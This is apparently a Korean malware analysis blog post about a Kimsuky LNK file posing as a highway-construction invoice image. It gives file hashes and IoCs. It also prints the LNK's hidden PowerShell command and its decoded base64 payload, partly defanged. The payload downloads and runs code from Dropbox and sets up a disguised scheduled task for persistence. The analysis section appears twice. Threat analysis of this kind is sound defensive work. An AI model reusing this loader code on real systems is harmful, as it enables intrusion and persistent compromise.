김수키(Kimsuky)에서 만든 고속국도 제29호선 세종-안성 간 건설공사 송장으로 위장 하는 악성코드-도x기업 20240610 송장.bmp.lnk(2024.7.30)
Contents
오늘은 김수키(Kimsuky) 에서 고속국도 제29호선 세종-안성 간 건설공사 송장으로 위장 하는 악성코드-도x기업 20240610 송장.bmp.lnk(2024.7.30) 에 대해 알아보겠습니다. 해당 악성코드는 압축 파일에 BMP 파일로 파일을 위장하고 있으며 실제로는 lnk 파일입니다.
일단 압축 파일의 해쉬값은 다음과 같습니다.
파일명:1.zip
사이즈:6.14 KB
MD5:4ac2192b01fce9e793f544d09877d16b
SHA-1:d83f47dfe20c38ccec3b9869f644fd4c128a94d0
SHA-256:3d3cc980ccf97cde5f3272fdc4c88569b77afe3f88e2e62186861daae99644d0
해당 악성코드 해쉬값
파일명: 도양기업 20240610 송장 갑지.bmp.lnk
사이즈:310 KB
MD5:09b1213c8a336541a4849d65b937293f
SHA-1:9e6e4ecaea18171e2266899f1bffda5de1091a2f
SHA-256:44ff60d352169f280801cf2075295aab0a6151ff8f77b66d16c82776efce7fea
악성코드 내용
StringData
{
namestring: Type: BMP File
Size: 358 KB
Date modified: 04/20/2024 11:23
relativepath: not present
workingdir: not present
commandlinearguments:
-windowstyle hidd(e)n -nop -NoProfile -NonInteractive
-ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCA
oW1N5c3RlbS5JTy5QY(X)RoX()To6R2V0VGVtcFBhdGgoKSkgIuuPhOyWkeq4sOyX(h)SAyMD
I0MDYwOCDshqHsnqUg6rCR7KeALmJtcCI7IHdnZXQgLVVyaSAiaHR0c
HM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9m(a)(S)9xdW82M3Ft
OGQzaXFsaG1weWliN3AvMjAyNDA(2)MDguYm1wP3Jsa2V5PXNicGNndWJnaTBpeG
l5bm01bGJzbnE4MXAmc3Q9eWxkYnNyb3UmZGw9MCIgLU91dEZpb(G)UgJGhoaDsg
JiAkaGhoOyAkcHBw(I)D0gSm9pbi1QYXRoICgkZW52OkFwcERhdG(E)pICJjaHJv
bWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEp
ICJ0ZW1wLnBzMS(I)7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcm
NvbnRlbnQuY29(t)L3NjbC9maS82dzkwdGxybndtajgzNTM3ZTltZDcvMDYxMHNh
ZmUteC50eHQ/cmxrZXk9ZDZjZWR2dGVvazNreWVwbmZweHRuM2k5aSZzdD15YjRq
endzMCZkbD0wIiAtT3V0RmlsZSAkYWFhOyAmIC(R)hYWE7IFJlbW92ZS1JdGVtIC
1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJH
BwcCAtRW5jb2RpbmcgVVRGODsgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQ(
W(N)0a(W)9uIC1FeGVjdXRlICdQb3dlclNoZWxsLmV4ZScgLUFyZ3VtZW50ICctV2lu
ZG93U3R5bGUgSGlkZGVuIC1ub3AgIC1Ob25JbnRlcmFjdGl2ZSAtTm9Qcm9maWxl
IC1FeGVjdXRpb25Qb2xpY3kg(Q)nlwYXNzIC1Db21tYW5kICImIHskYWJjID0gSm
9pbi1QYXRoICgkZW52OkFwcERhdGEpIFwiY2hyb21lLnBzMVwiOyAmICRhYmM7fS
InOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2(d)lciAtT25jZSAt
QXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZ(X)BldGl0aW9uSW50ZXJ2YWwgK
E5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0a(W)5ncyA9IE5ldy1TY2hlZH
VsZWRU(Y)XNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkV
GFzayAtVGFza05hbWUgIkNocm9tZVVwZGF0ZUNvcmVUYXNrTWFjaGluZUtPUiIgLUFjdGl
vbiAkYWN0aW9uIC1Uc(m)lnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICA
kYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd
2dldCAtVXJpICJodHRwczovL2RsLmR(y)b3Bib3h1c2VyY29udGVudC5jb20vc2NsL2ZpL
3M3ZDZhd2lkNTh4cjg5aHR(s)bnl5Yy8wNjEwc(20)FmZS1mLnR4dD9ybGtleT1lcXhiY2
gyMW5pbGhnd29ydHl3MHhiYmk5JnN0PXd3Y3RzeWIyJm(R)sPTAiIC1PdXRGaWxlICRhYW
E7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAt(0)Rm9yY2U7\"; $aa =
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64
String($ss));$cc = $env:appdata;$dd = \"user(.)ps1\";$ee = Join-Pat
h $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 898(9)7878; & $ee;
Remove-Item -Path $ee -Force;"
iconlocation: %SystemRoot%\system32\imageres(.)dll
}
Base 64 디코딩
$hhh = Join-Path ([System.IO.Path]::GetT(e)mpPath())
"도양기업 2(0)240608 송장 갑지(.)bmp"; wget -Uri "hxxps:/
/dl.dropboxusercontent(.)com/scl/fi/quo63qm8d3iqlhmpyib7p/2
0240608(.)bmp?rlkey=sbpcgubgi0ixiynm(5)lbsnq81p&st=yldbsrou
&dl=0" -OutFile $hhh; & $hhh; $ppp = Join-Path ($env(:AppDat
a) "chrome(.)ps1"; $str = '$aaa = Join-Path ($env:(A)ppData)
"temp(.)ps1"; wget -Uri "hxxps://dl(.)dropboxusercontent(.)co
m/scl/fi/6w90tlrnwmj83537e9md7/0610saf(e)-x(.)txt?rlkey=d6cedv
teok3kyepnfpxtn3i9i&st=yb4jzws0&dl=0" -OutFile $aaa; & $aaa; Rem
ove(-)Item -Path $aaa -Force;'; $str | Out-File -F(i)lePath $ppp
-Encoding U(T)F8; $action = New-Sch(e)duledTaskAction -Execute 'P
owerShell(.)exe' -Argument '-WindowStyle Hi(d)den -nop -NonIntera
ctive -No(P)rofile -Execution(P)olicy Bypass -Command "& {$abc (=)
Join-Path ($env:AppData) \"chrome(.)ps1\"; & $abc;}"'; $trigger …
일단 압축 파일의 해쉬값은 다음과 같습니다.
파일명:1.zip
사이즈:6.14 KB
MD5:4ac2192b01fce9e793f544d09877d16b
SHA-1:d83f47dfe20c38ccec3b9869f644fd4c128a94d0
SHA-256:3d3cc980ccf97cde5f3272fdc4c88569b77afe3f88e2e62186861daae99644d0
해당 악성코드 해쉬값
파일명: 도양기업 20240610 송장 갑지.bmp.lnk
사이즈:310 KB
MD5:09b1213c8a336541a4849d65b937293f
SHA-1:9e6e4ecaea18171e2266899f1bffda5de1091a2f
SHA-256:44ff60d352169f280801cf2075295aab0a6151ff8f77b66d16c82776efce7fea
악성코드 내용
StringData
{
namestring: Type: BMP File
Size: 358 KB
Date modified: 04/20/2024 11:23
relativepath: not present
workingdir: not present
commandlinearguments:
-windowstyle hidd(e)n -nop -NoProfile -NonInteractive
-ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCA
oW1N5c3RlbS5JTy5QY(X)RoX()To6R2V0VGVtcFBhdGgoKSkgIuuPhOyWkeq4sOyX(h)SAyMD
I0MDYwOCDshqHsnqUg6rCR7KeALmJtcCI7IHdnZXQgLVVyaSAiaHR0c
HM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9m(a)(S)9xdW82M3Ft
OGQzaXFsaG1weWliN3AvMjAyNDA(2)MDguYm1wP3Jsa2V5PXNicGNndWJnaTBpeG
l5bm01bGJzbnE4MXAmc3Q9eWxkYnNyb3UmZGw9MCIgLU91dEZpb(G)UgJGhoaDsg
JiAkaGhoOyAkcHBw(I)D0gSm9pbi1QYXRoICgkZW52OkFwcERhdG(E)pICJjaHJv
bWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEp
ICJ0ZW1wLnBzMS(I)7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcm
NvbnRlbnQuY29(t)L3NjbC9maS82dzkwdGxybndtajgzNTM3ZTltZDcvMDYxMHNh
ZmUteC50eHQ/cmxrZXk9ZDZjZWR2dGVvazNreWVwbmZweHRuM2k5aSZzdD15YjRq
endzMCZkbD0wIiAtT3V0RmlsZSAkYWFhOyAmIC(R)hYWE7IFJlbW92ZS1JdGVtIC
1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJH
BwcCAtRW5jb2RpbmcgVVRGODsgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQ(
W(N)0a(W)9uIC1FeGVjdXRlICdQb3dlclNoZWxsLmV4ZScgLUFyZ3VtZW50ICctV2lu
ZG93U3R5bGUgSGlkZGVuIC1ub3AgIC1Ob25JbnRlcmFjdGl2ZSAtTm9Qcm9maWxl
IC1FeGVjdXRpb25Qb2xpY3kg(Q)nlwYXNzIC1Db21tYW5kICImIHskYWJjID0gSm
9pbi1QYXRoICgkZW52OkFwcERhdGEpIFwiY2hyb21lLnBzMVwiOyAmICRhYmM7fS
InOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2(d)lciAtT25jZSAt
QXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZ(X)BldGl0aW9uSW50ZXJ2YWwgK
E5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0a(W)5ncyA9IE5ldy1TY2hlZH
VsZWRU(Y)XNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkV
GFzayAtVGFza05hbWUgIkNocm9tZVVwZGF0ZUNvcmVUYXNrTWFjaGluZUtPUiIgLUFjdGl
vbiAkYWN0aW9uIC1Uc(m)lnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICA
kYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd
2dldCAtVXJpICJodHRwczovL2RsLmR(y)b3Bib3h1c2VyY29udGVudC5jb20vc2NsL2ZpL
3M3ZDZhd2lkNTh4cjg5aHR(s)bnl5Yy8wNjEwc(20)FmZS1mLnR4dD9ybGtleT1lcXhiY2
gyMW5pbGhnd29ydHl3MHhiYmk5JnN0PXd3Y3RzeWIyJm(R)sPTAiIC1PdXRGaWxlICRhYW
E7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAt(0)Rm9yY2U7\"; $aa =
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64
String($ss));$cc = $env:appdata;$dd = \"user(.)ps1\";$ee = Join-Pat
h $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 898(9)7878; & $ee;
Remove-Item -Path $ee -Force;"
iconlocation: %SystemRoot%\system32\imageres(.)dll
}
Base 64 디코딩
$hhh = Join-Path ([System.IO.Path]::GetT(e)mpPath())
"도양기업 2(0)240608 송장 갑지(.)bmp"; wget -Uri "hxxps:/
/dl.dropboxusercontent(.)com/scl/fi/quo63qm8d3iqlhmpyib7p/2
0240608(.)bmp?rlkey=sbpcgubgi0ixiynm(5)lbsnq81p&st=yldbsrou
&dl=0" -OutFile $hhh; & $hhh; $ppp = Join-Path ($env(:AppDat
a) "chrome(.)ps1"; $str = '$aaa = Join-Path ($env:(A)ppData)
"temp(.)ps1"; wget -Uri "hxxps://dl(.)dropboxusercontent(.)co
m/scl/fi/6w90tlrnwmj83537e9md7/0610saf(e)-x(.)txt?rlkey=d6cedv
teok3kyepnfpxtn3i9i&st=yb4jzws0&dl=0" -OutFile $aaa; & $aaa; Rem
ove(-)Item -Path $aaa -Force;'; $str | Out-File -F(i)lePath $ppp
-Encoding U(T)F8; $action = New-Sch(e)duledTaskAction -Execute 'P
owerShell(.)exe' -Argument '-WindowStyle Hi(d)den -nop -NonIntera
ctive -No(P)rofile -Execution(P)olicy Bypass -Command "& {$abc (=)
Join-Path ($env:AppData) \"chrome(.)ps1\"; & $abc;}"'; $trigger …
IoC
09b1213c8a336541a4849d65b937293f
3d3cc980ccf97cde5f3272fdc4c88569b77afe3f88e2e62186861daae99644d0
44ff60d352169f280801cf2075295aab0a6151ff8f77b66d16c82776efce7fea
4ac2192b01fce9e793f544d09877d16b
9e6e4ecaea18171e2266899f1bffda5de1091a2f
d83f47dfe20c38ccec3b9869f644fd4c128a94d0
3d3cc980ccf97cde5f3272fdc4c88569b77afe3f88e2e62186861daae99644d0
44ff60d352169f280801cf2075295aab0a6151ff8f77b66d16c82776efce7fea
4ac2192b01fce9e793f544d09877d16b
9e6e4ecaea18171e2266899f1bffda5de1091a2f
d83f47dfe20c38ccec3b9869f644fd4c128a94d0